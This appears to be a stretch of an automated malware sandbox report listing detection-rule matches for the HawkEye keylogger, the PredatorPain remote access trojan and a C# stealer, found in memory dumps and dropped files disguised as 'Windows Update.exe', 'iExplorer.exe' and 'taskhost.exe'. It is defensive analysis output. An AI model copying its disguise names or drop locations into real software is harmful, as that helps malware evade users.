                    Source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 7.2.iExplorer.exe.72e7ae.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.2.iExplorer.exe.72e7ae.1.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.42e7ae.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.42e7ae.1.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 8.2.Windows Update.exe.42e7ae.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.2.Windows Update.exe.42e7ae.3.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 8.2.Windows Update.exe.3d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.2.Windows Update.exe.3d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.2.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.2.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d8949.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d8949.12.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.2.iExplorer.exe.2e4bf0c.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.42e7ae.13.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.42e7ae.13.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.2b89e50.14.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.2.Windows Update.exe.2b89e50.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.2b89ea8.8.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.3d8949.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d8949.6.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 8.0.Windows Update.exe.3d8949.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d8949.3.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, type: MEMORYMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000007.00000003.242361286.0000000000EC4000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPEDMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPEDMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
